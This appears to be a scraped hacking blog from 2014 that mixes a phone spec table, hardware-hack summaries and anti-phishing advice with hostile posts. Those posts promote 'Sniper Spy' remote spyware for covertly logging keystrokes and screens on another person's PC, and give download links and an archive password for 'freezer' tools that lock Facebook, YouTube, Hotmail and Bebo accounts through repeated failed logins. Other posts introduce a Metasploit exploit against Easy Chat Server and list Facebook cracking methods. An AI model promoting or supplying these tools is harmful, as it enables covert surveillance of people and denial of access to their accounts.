<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Weight </td> <td valign="top"><br /></td><td colspan="2">85 g </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Battery </td> <td valign="top"><br /></td><td colspan="2">Talk time Up to 6 h 54 min, Stand-by Up to 550 h, <b>Music play Up to 28 h</b> </td> </tr>
<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="29"> Memory </td> <td valign="top"><br /></td><td colspan="2"><b>140 MB</b> built-in, <b>128 MB RAM</b>, <b>256 MB ROM</b> + microSD card (supports up to 32GB) </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="29"> Processor </td> <td valign="top"><br /></td><td colspan="2"><b>1 GHz</b> </td> </tr>
<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Connectivity </td> <td valign="top"><br /></td><td colspan="2"><span style="color: #000077;"><b>Bluetooth</b></span> v2.1 with A2DP, EDR, <span style="color: #000077;"><b>USB</b></span>, <span style="color: #000077;"><b>GPRS</b></span>, <span style="color: #000077;"><b>EDGE</b></span>, 3G (HSDPA 10.2 Mbps, HSUPA 2 Mbps) </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Display Size </td> <td valign="top"><br /></td><td colspan="2">240 x 320 pixels, 2.4 inches, Proximity sensor </td> </tr>
<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Display Colour </td> <td valign="top"><br /></td><td colspan="2"><b>TFT resistive touchscreen</b>, 256K colors </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="25"> Operating<br />
Frequency / Band </td> <td valign="top"><br /></td><td colspan="2">GSM 850 / 900 / 1800 / 1900 HSDPA 850 / 900 / 1900 / 2100 </td> </tr>
<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="30"> <span class="IL_AD" id="IL_AD11">Browser</span></td> <td valign="top"><br /></td><td colspan="2">WAP 2.0/xHTML, HTML </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Colors</td> <td valign="top"><br /></td><td colspan="2">Graphite, Night Shade, <span class="IL_AD" id="IL_AD1">Gold</span>, White Silver, Pink, Red </td> </tr>
<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Entertainment </td> <td valign="top"><br /></td><td colspan="2">Stereo <span style="color: #000077;"><b><span style="color: #000077;"><b>FM</b></span> radio</b></span> with RDS, 3.5mm audio jack, MP4/H.264/H.263/WMV player, MP3/WAV/WMA/AAC player, SNS integration, Games (built-in + downloadable) </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Camera </td> <td valign="top"><br /></td><td colspan="2"><b>5 MP</b>, 2592x1944 pixels, fixed focus, <span class="IL_AD" id="IL_AD6">Video</span> (VGA 30fps) </td> </tr>
<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Other Features </td> <td valign="top"><br /></td><td colspan="2">Flash Lite support, Voice memo, Predictive text input, Speakerphone </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="30"> <span class="IL_AD" id="IL_AD9">Ring</span> Tones </td> <td valign="top"><br /></td><td colspan="2">Polyphonic, WAV, MP3 </td> </tr>
<tr class="RowBG1"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Messaging </td> <td valign="top"><br /></td><td colspan="2">SMS(threaded view), MMS, Email, Push Email, IM </td> </tr>
<tr class="RowBG2"> <td valign="top"><br /></td><td class="hdngArial" height="30"> Price </td> <td valign="top"><br /></td><td colspan="2">Price in Rs: <b>9,200</b> Price in USD: <b>$107</b> </td></tr>
</tbody></table>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-79814433584052525352014-06-22T09:00:00.000-07:002014-06-22T09:00:12.748-07:00Sniper Spy Remote Software for hacking<div dir="ltr" style="text-align: left;" trbidi="on">
<em><span style="color: red;"><strong><span style="color: black;">Sniper spy </span></strong></span></em>is the industry leading <strong>Remote password hacking software</strong>combined with the <strong>Remote Install and Remote Viewing feature.</strong><br />
Once installed on the remote PC(s) you wish, you only need to login to
your own personal SniperSpy account to view activity logs of the remote
PC’s! This means that you can view logs of the remote PC’s from
anywhere in the world as long as you have internet access!<br />
<strong>Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy</strong> allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! <strong>The only remote PC spy software with a SECURE control panel!</strong><br />
This Remote PC Spy software also saves screenshots along with text logs
of chats, websites, keystrokes in any language and more. Remotely view
everything your child, employee or anyone does while they use your
distant PC. Includes LIVE admin and control commands!<br /><br /><a href="http://hackingarticles.com/sniper-spy-remote-password-hacking-software/" rel="nofollow" target="_blank"><b>Read More. . .</b></a></div>
Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-7171379281281950124.post-73110310895672000742014-06-22T08:56:00.001-07:002014-06-27T01:28:15.090-07:00Backdoor in Linksys and Netgear routers - Hacking<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0LSquIZjroxUfUW_5zI7CsQ5DDqIzA5WU0rkFHe4tE7TDQw-p7XLnmkk0LgCO5SzXW0z8XFiPB7hIcgK-a1r_7xxJlX2v8oj50egyUEhDip_vXfkY7yBhuOUMaPTRzCiZ4eehPsUQ1QE/s1600/backdoor-linksys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="router" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0LSquIZjroxUfUW_5zI7CsQ5DDqIzA5WU0rkFHe4tE7TDQw-p7XLnmkk0LgCO5SzXW0z8XFiPB7hIcgK-a1r_7xxJlX2v8oj50egyUEhDip_vXfkY7yBhuOUMaPTRzCiZ4eehPsUQ1QE/s1600/backdoor-linksys.png" height="206" title="routers hacking" width="400" /></a></div>
<br />
This news could hurt the reputation of both companies. A passionate
(and obviously very competent) reverse-engineer from France, Eloi Vanderbeken
forgot the admin interface password of his router and so he just wanted
to have fun accessing the administration side and that’s when he
discovered a backdoor in his <b>Linksys WAG200G</b> router. After publishing this discovery on Github, other users have confirmed its existence in at least three other routers:<br />
<ul>
<li>Netgear DM111Pv2</li>
<li>Linksys WAG320N</li>
<li>Linksys WAG54G2</li>
</ul>
Other routers are suspected of providing equal opportunity to obtain the administrator password through the <b>32764 port</b>, but it has not yet been confirmed:<br />
<ul>
<li>Netgear DG934</li>
<li>Netgear DG834</li>
<li>Netgear WPNT834</li>
<li>Netgear DG834G</li>
<li>Netgear WG602</li>
<li>Netgear WGR614</li>
<li>Netgear DGN2000</li>
<li>Linksys WAG120N</li>
<li>Linksys WAG160N</li>
<li>Linksys WRVS4400N<br /><br /><a href="http://hackingarticles.com/backdoor-in-linksys-and-netgear-routers/" rel="nofollow" target="_blank"><b>Read more. . .</b></a></li>
</ul>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-20565930332107297082014-06-22T08:50:00.001-07:002014-06-22T08:50:42.935-07:00Hacking in Computer and Predators<div dir="ltr" style="text-align: left;" trbidi="on">
<h3>
How are computer hackers and predators a threat to computer security?</h3>
People, not computers, create computer threats. Computer predators
victimize others for their own gain. Give a predator access to the
Internet — and to your PC — and the threat they pose to your security
increases exponentially. Computer hackers are unauthorized users who
break into computer systems in order to steal, change or destroy
information, often by installing dangerous malware without your
knowledge or consent. Their clever tactics and detailed technical
knowledge help them access information you really don’t want them to
have.<br />
<h3>
How do computer hackers and predators find me?</h3>
Anyone who uses a computer connected to the Internet is susceptible
to the threats that computer hackers and predators pose. These online
villains typically use phishing scams, spam email
or instant messages and bogus Web sites to deliver dangerous malware to
your computer and compromise your computer security. Computer hackers
can also try to access your computer and private information directly if
you are not protected with a firewall. They may also monitor your chat
room conversations or peruse your personal Web page. Usually disguised
with a bogus identity, predators can lure you into revealing sensitive
personal and financial information, or much worse.<br />
<h3>
What can computer hackers and predators do to me?</h3>
While your computer is connected to the Internet, the malware a
hacker has installed on your PC quietly transmits your personal and
financial information without your knowledge or consent. Or, a computer
predator may pounce on the private information you unwittingly revealed.
In either case, they may:<br />
<ul>
<li>Hijack your usernames and passwords</li>
<li>Steal your money and open credit card and bank accounts in your name</li>
<li>Ruin your credit</li>
<li>Request new account Personal Identification Numbers (PINs) or additional credit cards</li>
<li>Make purchases</li>
<li>Add themselves or an alias that they control as an authorized user so it’s easier to use your credit</li>
<li>Obtain cash advances</li>
<li>Use and abuse your Social Security number</li>
<li>Sell your information to other parties who will use it for illicit or illegal purposes</li>
</ul>
Predators can pose a serious physical threat. Use extreme caution
when agreeing to meet an online “friend” or acquaintance in person.<br />
<h3>
How will I know?</h3>
Check the accuracy of your personal accounts, credit cards and
documents. Are there unexplained transactions? Questionable or
unauthorized changes? If so, dangerous malware installed by predators or
hackers may already be lurking.<br />
<h3>
What can I do about computer hackers and predators?</h3>
When you arm yourself with information and resources, you’re wiser about computer security threats and less vulnerable to threat tactics. Hackers and predators pose equally serious and but very different threats.<br />
<h4>
To protect your computer from hackers and predators:</h4>
<ul>
<li>Continually check the accuracy of personal accounts and deal with any discrepancies right away</li>
<li>Use extreme caution when entering chat rooms or posting personal Web pages</li>
<li>Limit the personal information you post on a personal Web pages</li>
<li>Carefully monitor requests by online “friends” or acquaintances for predatory behavior</li>
<li>Keep personal and financial information out of online conversations</li>
<li>Use extreme caution when agreeing to meet an online “friend” or acquaintance in person</li>
</ul>
</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7171379281281950124.post-76356773269258151542014-06-22T08:47:00.003-07:002014-06-22T08:47:48.757-07:00Computer hacking using EFS Easy Chat Server Buffer Overflow in LAN<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<span style="color: black;">This
module exploits a stack buffer overflow in EFS Software Easy Chat
Server. By sending a overly long authentication request, an attacker may
be able to execute arbitrary code. NOTE: The offset to SEH is
influenced by the installation path of the program. The path, which
defaults to “C:Program FilesEasy Chat Server”, is concatentated with
“users” and the string passed as the username HTTP parameter.</span></div>
<h5 style="text-align: justify;">
<span style="color: black;"><strong>Exploit Targets</strong></span></h5>
<div style="text-align: justify;">
<span style="color: black;">Easy Chat Server 2.5</span></div>
<h5 style="text-align: justify;">
<span style="color: black;"><strong>Requirement</strong></span></h5>
<div style="text-align: justify;">
<span style="color: black;"><strong>Attacker</strong>: Backtrack 5</span></div>
<div style="text-align: justify;">
<span style="color: black;"><strong>Victim PC</strong>: Windows XP</span></div>
<div style="text-align: justify;">
<span style="color: black;">Open backtrack terminal type <strong>msfconsole<br /><br /><a href="http://www.hackingarticles.in/hack-pc-in-lan-using-efs-easy-chat-server-buffer-overflow-attack/" rel="nofollow" target="_blank">Read more. . .</a></strong></span></div>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-9512488776943918202014-02-28T07:04:00.001-08:002014-02-28T07:04:49.135-08:00Download NMAP:NETWORK SCANNING TOOL Network hacking<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi876IC00VF3tT6rWXvVoLGI-d2iSpTHEBZaSM4KsSXpxvRYxARoJJZuL_KRtTf0HJOsnpb3qNvsMYXWOWJYV9kJXz2x80LCzqoFJ0jqMF3mseoUt5BTBaARqzCLi-XV10TJkJhNNCLDvo/s1600/Download_button1-300x157.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZwYsF6jHRl40ol9DoOJugCQKvFPQILuq4ueSCVUQeWnWK4oYMHmdGm7qi9uHPdyT_2jttA3srtO8a5jpMEYVBhPXx2Oz3iVKaUmgGErp4d5cPJY6UcPkt43gu5vabpNz6KWT3VmM7r7Y/s320/nmap.png" /><br />
</div>
<br />
Nmap ("Network Mapper") is a free and open source utility for network
exploration or security auditing. Many systems and network
administrators also find it useful for tasks such as network inventory,
managing service upgrade schedules, and monitoring host or service
uptime. Nmap uses raw IP packets in novel ways to determine what hosts
are available on the network, what services (application name and
version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in
use, and dozens of other characteristics. It was designed to rapidly
scan large networks, but works fine against single hosts. <br />
<br />
Download here (Linux Users):<br />
<a href="http://nmap.org/dist/nmap-5.00.tar.bz2" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi876IC00VF3tT6rWXvVoLGI-d2iSpTHEBZaSM4KsSXpxvRYxARoJJZuL_KRtTf0HJOsnpb3qNvsMYXWOWJYV9kJXz2x80LCzqoFJ0jqMF3mseoUt5BTBaARqzCLi-XV10TJkJhNNCLDvo/s1600/Download_button1-300x157.png" height="104" width="200" /></a><br /><br />
<br />
Download here (Windows Users): <br /> <a href="http://nmap.org/dist/nmap-5.00-setup.exe" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img alt=" http://nmap.org/dist/nmap-5.00-setup.exe" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi876IC00VF3tT6rWXvVoLGI-d2iSpTHEBZaSM4KsSXpxvRYxARoJJZuL_KRtTf0HJOsnpb3qNvsMYXWOWJYV9kJXz2x80LCzqoFJ0jqMF3mseoUt5BTBaARqzCLi-XV10TJkJhNNCLDvo/s1600/Download_button1-300x157.png" height="104" width="200" /></a><br /><br /></div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-7171379281281950124.post-2227783340625433632014-02-28T06:57:00.001-08:002014-02-28T06:57:48.078-08:00Download facebook,youtube and hotmail freezer<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXUQJ_So6fQX_wW9t9NzeA3wG92PokgFUt4xQB7HTqR9MVVg-KSuz5RTjeBvd0nOFR2DlGY4B6nVQ_op8dbUyvKCsIbyOLDtmc-ONCXDO17ozTYJX3TK70RGXMXlwv2-aWaieDUpSEnw/s320/icon_facebook.png" /></div>
<div style="font-family: Georgia,"Times New Roman",serif;">
<br /><span style="font-size: x-small;">This is Windows,live, Youtube, and facebook freezer. You can freeze facebook, hotmail, youtube account using this software.<br />This wonderful hacking program can freeze Youtube, Windows Live and Facebook accounts by use of repeated wrong login attempts. </span><br />
</div>
<span style="font-size: x-small;"></span><span style="font-size: x-small;"></span><br />
<a href="http://www.ziddu.com/download/6949548/Youtube-WindowsLive-FacebookFreezer.rar.html" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi876IC00VF3tT6rWXvVoLGI-d2iSpTHEBZaSM4KsSXpxvRYxARoJJZuL_KRtTf0HJOsnpb3qNvsMYXWOWJYV9kJXz2x80LCzqoFJ0jqMF3mseoUt5BTBaARqzCLi-XV10TJkJhNNCLDvo/s1600/Download_button1-300x157.png" height="104" width="200" /></a></div>
<div style="text-align: left;">
<span style="font-size: x-large;"><span>Password: hackingguide</span></span></div>
<br />Tags:-<br />Hack facebook, facbook freezer, hack facebook id, hack youtube account, hack hotmail account, youtube freezer, facebook freezer, hotmail freezer<br /><div>
<div>
<span style="font-size: x-small;"><br />
</span><br /><h2 style="text-align: left;">
<br /></h2>
</div>
</div>
</div>
Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-7171379281281950124.post-20284183645375998452014-02-28T06:48:00.000-08:002014-02-28T06:48:38.380-08:00Hack Bebo account - Bebo freezer software<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM0h1tPqELgy2o5uBCYmjsFWLaanQlB0oT0EadgXBtaOLMGra9xa73LUwDp45HH0ZybPqAjcSWeXfeESjpUNrzChkIyDbgkYQRIn62hZV0fe_ihKr1462F0gvPHlomWHoLcKbMGgqEbzE/s320/screenshotgs1.jpg" /></div>
You can Hack Bebo servers by this software.<br />
<span style="font-family: Georgia,"Times New Roman",serif; font-size: x-small;">This
program can freeze Bebo accounts by hitting Bebo servers with constant
wrong login attempts. Bebo is a large social networking community having
millions of users all over the world. <br /><br /><span id="goog_1638858392"></span><span id="goog_1638858393"></span></span> <a href="http://www.mediafire.com/error.php?errno=320&origin=download" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi876IC00VF3tT6rWXvVoLGI-d2iSpTHEBZaSM4KsSXpxvRYxARoJJZuL_KRtTf0HJOsnpb3qNvsMYXWOWJYV9kJXz2x80LCzqoFJ0jqMF3mseoUt5BTBaARqzCLi-XV10TJkJhNNCLDvo/s1600/Download_button1-300x157.png" height="104" width="200" /></a></div>
Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-7171379281281950124.post-45134572736822569322014-02-23T02:43:00.001-08:002014-02-28T04:25:24.270-08:00How to prevent facebook account from hacking attack<div dir="ltr" style="text-align: left;" trbidi="on">
<ol class="steps_list_2">
<li><b class="whb">Here are some steps to prevent your facebook account from hackers attack!</b></li>
<li><img alt="Protect Your Facebook Account from Hackers Step 2 Version 2.jpg" src="http://pad3.whstatic.com/images/thumb/b/b6/Protect-Your-Facebook-Account-from-Hackers-Step-2-Version-2.jpg/670px-Protect-Your-Facebook-Account-from-Hackers-Step-2-Version-2.jpg" height="300" width="400" />
<div class="step_num">
2</div>
<b class="whb">Never share your passwords with anyone including your friends and family.</b> Browsing through a secure connection is always advisable.
</li>
<li>
<div class="mwimg largeimage floatcenter " style="max-width: 670px;">
<img alt="Protect Your Facebook Account from Hackers Step 3 Version 2.jpg" src="http://pad1.whstatic.com/images/thumb/4/4d/Protect-Your-Facebook-Account-from-Hackers-Step-3-Version-2.jpg/670px-Protect-Your-Facebook-Account-from-Hackers-Step-3-Version-2.jpg" height="300" width="400" /></div>
<div class="step_num">
3</div>
<b class="whb">Don’t get your news feed flooded with suspicious links.</b>
Ensure that you don’t click on any links of games, apps, and others
that you are not sure of. Avoid permitting third party apps accessing
your information. If you are not using any apps, it’s better to disable
or remove those apps.
</li>
<li>
<div class="mwimg largeimage floatcenter " style="max-width: 670px;">
<img alt="Protect Your Facebook Account from Hackers Step 4 Version 3.jpg" src="http://pad2.whstatic.com/images/thumb/d/dd/Protect-Your-Facebook-Account-from-Hackers-Step-4-Version-3.jpg/670px-Protect-Your-Facebook-Account-from-Hackers-Step-4-Version-3.jpg" height="300" width="400" /></div>
<div class="step_num">
4</div>
<b class="whb">Add a secondary email ID to your account.</b>
In case your profile is hacked, Facebook will send account recovery
information to the secondary email ID also. Before these steps,
understand the privacy policy of Facebook.
</li>
<li>
<div class="mwimg largeimage floatcenter " style="max-width: 670px;">
<img alt="Protect Your Facebook Account from Hackers Step 5 Version 3.jpg" src="http://pad3.whstatic.com/images/thumb/a/a5/Protect-Your-Facebook-Account-from-Hackers-Step-5-Version-3.jpg/670px-Protect-Your-Facebook-Account-from-Hackers-Step-5-Version-3.jpg" height="300" width="400" /></div>
<div class="step_num">
5</div>
<b class="whb">Ensure that you accept only
persons you know as your friends as when you accept strangers, you allow
them to access your personal information.</b> It’s always better to avoid posting any financial or personal details.
</li>
<li>
<div class="mwimg largeimage floatcenter " style="max-width: 670px;">
<img alt="Protect Your Facebook Account from Hackers Step 6.jpg" src="http://pad2.whstatic.com/images/thumb/b/bd/Protect-Your-Facebook-Account-from-Hackers-Step-6.jpg/670px-Protect-Your-Facebook-Account-from-Hackers-Step-6.jpg" height="300" width="400" /></div>
<div class="step_num">
6</div>
<b class="whb">Change your passwords regularly and use unique passwords.</b> Don’t forget to activate your login notifications.
</li>
<li>
<div class="mwimg largeimage floatcenter " style="max-width: 670px;">
<img alt="Protect Your Facebook Account from Hackers Step 7.jpg" src="http://pad3.whstatic.com/images/thumb/b/b1/Protect-Your-Facebook-Account-from-Hackers-Step-7.jpg/670px-Protect-Your-Facebook-Account-from-Hackers-Step-7.jpg" height="300" width="400" /></div>
<div class="step_num">
7</div>
<b class="whb">For many of us, Facebook is our best buddy, a chronicle of our life, our diary of sorts and an outlet for our creativity.</b>
We can’t risk our Facebook account at any cost and we certainly try all
the possible ways to keep it as personal and secure as we can.
</li>
</ol>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-49019580821794852372014-02-23T02:24:00.001-08:002014-02-23T02:24:30.015-08:00Android and Arduino RF Outlet Selector - Hacking<div dir="ltr" style="text-align: left;" trbidi="on">
Cyber Monday may be behind us, but there are always some hackable, inexpensive electronics to be had. [Stephen's] <a href="https://www.blogger.com/blogger.g?blogID=7171379281281950124" target="_blank">wireless Android/Arduino outlet hack</a> may be the perfect holiday project on the cheap, especially considering you can once again snag the <a href="https://www.blogger.com/blogger.g?blogID=7171379281281950124" target="_blank">right remote controlled outlets from Home Depot</a>. This project is similar to other remote control outlet builds we’ve seen here, but for around $6 per outlet: a tough price to beat.<br />
[Stephen] Frankenstein’d an inexpensive RF device <a href="https://www.blogger.com/blogger.g?blogID=7171379281281950124" target="_blank">from Amazon</a> into
his build, hooking the Arduino up to the 4 pins on the transmitter. The
first step was to reverse engineer the communication for the outlet,
which was accomplished through some down and dirty <a href="https://www.blogger.com/blogger.g?blogID=7171379281281950124" target="_blank">Arduino logic analyzing</a>.
The final circuit included a standard Arduino Ethernet shield, which
[Stephen] hooked up to his router and configured to run as a web server.
Most of the code was borrowed from the <a href="https://www.blogger.com/blogger.g?blogID=7171379281281950124" target="_blank">RC-Switch outlet project</a>, but the protocols from that build are based on US standards and did not quite fit [Stephen's] needs, so he turned to a <a href="https://www.blogger.com/blogger.g?blogID=7171379281281950124" target="_blank">similar Instructables project </a>to work out the finer details.<br />
Stick around after the break for a quick video demonstration, then check out another wireless outlet hack for inspiration.<br /><br />Read more at:<a href="http://hackaday.com/2013/12/06/android-and-arduino-rf-outlet-selector/" target="_blank"> http://hackaday.com/2013/12/06/android-and-arduino-rf-outlet-selector/</a></div>
Unknownnoreply@blogger.com6tag:blogger.com,1999:blog-7171379281281950124.post-55252692777581459992014-02-23T02:22:00.002-08:002014-02-23T02:22:17.231-08:00Your mouse - A terrible webcam for hacking<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Your optical mouse contains Camera!</b><br /><br />It should come as no surprise your optical mouse contains a very
tiny, very low resolution camera. [Franci] decided to take apart one of
his old mice and turn that tiny optical sensor into a webcam.<br />
Inside [Franci]‘s Logitech RX 250 is an ADNS-5020 optical sensor.
This three wire SPI device stuffed into an 8-pin package is a 15×15
pixel grayscale image sensor. [Franci] started this project by bringing
out the Arduino and Ethernet shield. After soldering a pull-up resistor
to the image sensor’s reset pin, connecting the rest of the circuit was
as simple as soldering a few wires to the Arduino.<br />
The Arduino sketch sends the image data for each pixel to a computer
over a serial connection. A bit of javascript and a touch of HTML takes
this pixel data and turns it into a webpage with a live view of whatever
is directly under [Franci]‘s mouse.<br /><br />Read More at:<a href="http://hackaday.com/2014/01/14/your-mouse-is-a-terrible-webcam/" target="_blank"> http://hackaday.com/2014/01/14/your-mouse-is-a-terrible-webcam/</a></div>
Unknownnoreply@blogger.com6tag:blogger.com,1999:blog-7171379281281950124.post-29897491641914442042014-02-23T02:19:00.000-08:002014-02-23T02:19:30.397-08:00Android+Arduino HACKING through Face Following RC Car<div dir="ltr" style="text-align: left;" trbidi="on">
To some of us, hacking an RC Car to simply follow a black line or
avoid obstacles is too easy, and we’re sure [Shazin] would agree with
that, since he created an RC Car that follows your face!<br />
The first step to this project was to take control of the RC Car, but
instead of hijacking the transmitter, [Shazin] decided to control the
car directly. This isn’t any high-end RC Car though, so forget about PWM
control. Instead, a single IC (RX-2)
was found to handle both the RF Receiver and H-Bridges. After a bit of
probing, the 4 control lines (forward/back and left/right) were
identified and connected to an Arduino.<br />
[Shazin] paired the Arduino with a USB Host Shield and connected it up with his Android phone through the ADB (Android Debug Bridge). He then made some modifications to the OpenCV
Android Face Detection app to send commands to the Arduino based on
‘where’ the Face is detected; if the face is in the right half of the
screen, turn right, if not, turn left and go forward.<br />
This is a really interesting project with a lot of potential; we’re
just hoping [Shazin] doesn’t have any evil plans for this device like
strapping it to a Tank Drone that locks on to targets!<br />
<br />Source: <a href="http://hackaday.com/2014/01/15/androidarduino-face-following-rc-car/">http://hackaday.com/2014/01/15/androidarduino-face-following-rc-car/</a></div>
Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-7171379281281950124.post-38559135769827553782014-02-23T02:16:00.000-08:002014-02-23T02:16:10.487-08:00How to do phishing? How to Protect Yourself from phising<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 class="noTop">
What is Phishing?</h2>
<span>There's a new type of
Internet piracy called "phishing." It's pronounced "fishing," and that's
exactly what these thieves are doing: "fishing" for your personal
financial information. What they want are account numbers, passwords,
Social Security numbers, and other confidential information that they
can use to loot your checking account or run up bills on your credit
cards. </span><br />
<span>In the worst case, you could find yourself a victim of identity
theft. With the sensitive information obtained from a successful
phishing scam, these thieves can take out loans or obtain credit cards
and even driver's licenses in your name. They can do damage to your
financial history and personal reputation that can take years to
unravel. But if you understand how phishing works and how to protect
yourself, you can help stop this crime. </span><br />
<h2>
How Phishing Works</h2>
<span>In a typical case, you'll receive an
email that appears to come from a reputable company that you recognize
and do business with, such as your financial institution. In some cases,
the email may appear to come from a government agency, including one of
the federal financial institution regulatory agencies. </span><br />
<span>The email will probably warn you of a serious problem that
requires your immediate attention. It may use phrases, such as
"Immediate attention required," or "Please contact us immediately about
your account." The email will then encourage you to click on a button to
go to the institution's web site. In a phishing scam, you could be
redirected to a phony web site that may look exactly like the real
thing. Sometimes, in fact, it may be the company's actual web site. In
those cases, a pop-up window will quickly appear for the purpose of
harvesting your financial information. </span><br />
<span>In either case, you may be asked to update your account
information or to provide information for verification purposes: your
Social Security number, your account number, your password, or the
information you use to verify your identity when speaking to a real
financial institution, such as your mother's maiden name or your place
of birth.<strong> WARNING: If you provide the requested information, you may find yourself the victim of identity theft.</strong></span><br />
<h2>
How to Protect Yourself</h2>
<span><strong>Never provide your personal information in response to an unsolicited request</strong>,
whether it is over the phone or over the Internet or even a fax or
letter. Emails and Internet pages created by phishers may look exactly
like the real thing. They may even have a fake padlock icon that
ordinarily is used to denote a secure site. (It's important to keep
anti-virus and anti-spam filtering software up-to-date on your
computer.) If you did not initiate the communication, you should not
provide any information.</span><br />
<span><strong>If you believe the contact may be legitimate, contact the financial institution yourself.</strong>
You can find phone numbers and web sites on the monthly statements you
receive from your financial institution, or you can look the company up
in a phone book or on the Internet. The key is that you should be the
one to initiate the contact, using contact information that you have
verified yourself. </span><br />
<span><strong>Never provide your password over the phone or in response to an unsolicited Internet request.</strong>
A financial institution would never ask you to verify your account
information online. Thieves armed with this information and your account
number can help themselves to your savings. (It is a good idea to
periodically change your passwords and PIN numbers to improve security.)
</span><br />
<span><strong>Review account statements regularly to ensure all charges are correct.</strong>
If your account statement is late in arriving, call your financial
institution to find out why. If your financial institution offers
electronic account access, periodically review activity online to catch
suspicious activity. </span></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7171379281281950124.post-43269464086006590142014-02-23T02:11:00.000-08:002014-02-23T02:12:37.112-08:00Some best and common Facebook hacking techniques<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<span style="font-family: Georgia, Times New Roman, serif;"><span style="background-color: white; border: 0px; color: #444444; line-height: 21px; margin: 0px; padding: 0px; vertical-align: baseline;">In this article i will tell you some hacking techniques which is used most commonly and is considered to be best.<br /><br />We have discussed alot about popular <span class="IL_AD" id="IL_AD11">password cracking</span>
methods such as Bruteforce, Dictionary attack and Rainbow tables.
However a question I get asked frequently is if it's possible to <span class="IL_AD" id="IL_AD10">crack</span> a Facebook account. So I wish to clear concepts related to Hacking/Cracking <span class="IL_AD" id="IL_AD4">Facebook accounts</span>. First of all "Hacking a Facebook account" and "Cracking a facebook account" are both different terminologies.</span><span style="background-color: white; border: 0px; color: #444444; line-height: 21px; margin: 0px; padding: 0px; vertical-align: baseline;">Hacking a facebook account refers to foolproof methods such as Phishing, keylogging, <span class="IL_AD" id="IL_AD3">Social engineering</span> etc.</span><span style="background-color: white; border: 0px; color: #444444; line-height: 21px; margin: 0px; padding: 0px; vertical-align: baseline;">However the terminology cracking refers to the methods such as Bruteforce, Dictionary attacks etc.</span></span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: xx-small;"><span style="line-height: 21px;">1:</span></span><span style="background-color: white; border: 1pt none windowtext; color: #444444; line-height: 115%; padding: 0in;">Brute Force Attacks</span><span style="color: #444444; line-height: 115%;"> </span></div>
<div style="text-align: left;">
<span style="color: #444444; line-height: 115%;">2:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Dictionary Attacks</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">3:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Cracking Facebook Accounts</span></div>
<div style="text-align: left;">
